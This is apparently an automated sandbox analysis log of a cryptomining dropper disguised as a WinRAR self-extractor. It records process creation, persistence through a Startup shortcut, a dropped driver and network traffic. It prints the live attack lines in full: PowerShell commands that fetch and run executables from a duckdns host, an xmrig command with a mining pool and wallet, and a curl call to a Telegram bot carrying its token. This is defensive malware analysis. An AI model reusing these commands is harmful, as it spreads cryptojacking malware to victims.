Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\1.exe "C:\Users\user\AppData\Roaming\1.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\process.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\ProgramData\Drivers\xmrig.exe xmrig.exe --donate-level 5 -o pool.supportxmr.com:443 -u 49LzTohDTP4MAvjfeeKB7pecfkp8MppQKZu5yjawPHfH2aJFbLhgV459XX9y3qoAmjJvxiewcw2bK2toFoMVEAQSLB878rm -k --tls -p speed
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Users\user\AppData\Roaming\1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\ping.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl "https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: Updater.lnk.6.dr LNK file: ..\..\..\..\..\..\..\..\..\ProgramData\Drivers\winproc.vbs
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: 6.exe, 00000006.00000003.1507397894.000001B666732000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.6.dr
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe, tmp.vbs.27.dr, 6.exe.5.dr
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 2.exe.52.dr, DllHandler.cs .Net Code: DllNodeHandler System.Reflection.Assembly.Load(byte[])
Source: 2.exe.52.dr, DllHandler.cs .Net Code: DllNodeHandler
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -OutFile 'C:\Users\user\AppData\Roaming\6.exe'; C:\Users\user\AppData\Roaming\6.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -OutFile 'C:\Users\user\AppData\Roaming\1.exe'; C:\Users\user\AppData\Roaming\1.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe' -OutFile 'C:\Users\user\AppData\Roaming\2.exe'; C:\Users\user\AppData\Roaming\2.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -OutFile 'C:\Users\user\AppData\Roaming\6.exe'; C:\Users\user\AppData\Roaming\6.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -OutFile 'C:\Users\user\AppData\Roaming\1.exe'; C:\Users\user\AppData\Roaming\1.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe' -OutFile 'C:\Users\user\AppData\Roaming\2.exe'; C:\Users\user\AppData\Roaming\2.exe" Jump to behavior
Binary contains a suspicious time stamp
Source: 2.exe.52.dr Static PE information: 0xB6F61BA2 [Sat Apr 9 13:44:02 2067 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033DCA18 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,strlen,malloc,GetSystemDirectoryA,strlen,strcpy,strlen,strcpy,LoadLibraryA,free, 27_2_00007FF7033DCA18
File is packed with WinRar
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_7120125 Jump to behavior
PE file contains sections with non-standard names
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: section name: .didat
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: section name: _RDATA
Source: 6.exe.5.dr Static PE information: section name: .didat
Source: 6.exe.5.dr Static PE information: section name: _RDATA
Source: xmrig.exe.6.dr Static PE information: section name: .xdata
Source: tmp.vbs.27.dr Static PE information: section name: .didat
Source: tmp.vbs.27.dr Static PE information: section name: _RDATA
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332D4D00 pushfq ; iretd 0_2_00007FF7332D4D01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFE7DB700BD pushad ; iretd 5_2_00007FFE7DB700C1
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5744D00 pushfq ; iretd 6_2_00007FF6C5744D01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFE7DB519AF pushad ; ret 15_2_00007FFE7DB519B9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFE7DB500BD pushad ; iretd 15_2_00007FFE7DB500C1
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2E4D00 pushfq ; iretd 31_2_00007FF75C2E4D01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 52_2_00007FFE7DB500BD pushad ; iretd 52_2_00007FFE7DB500C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 52_2_00007FFE7DB51AD9 push es; ret 52_2_00007FFE7DB51ADA

Persistence and Installation Behavior
barindex
Sample is not signed and drops a device driver
Source: C:\Users\user\AppData\Roaming\6.exe File created: C:\ProgramData\Drivers\WinRing0x64.sys Jump to behavior
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\6.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1.exe File created: C:\Users\user\AppData\Local\Temp\tmp.vbs Jump to dropped file
Source: C:\Users\user\AppData\Roaming\6.exe File created: C:\ProgramData\Drivers\xmrig.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\1.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\6.exe File created: C:\ProgramData\Drivers\WinRing0x64.sys Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\2.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Roaming\6.exe File created: C:\ProgramData\Drivers\xmrig.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\6.exe File created: C:\ProgramData\Drivers\WinRing0x64.sys Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Users\user\AppData\Roaming\1.exe File created: C:\Users\user\AppData\Local\Temp\tmp.vbs Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\AppData\Roaming\6.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Updater.lnk Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\AppData\Roaming\6.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Updater.lnk Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49725
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
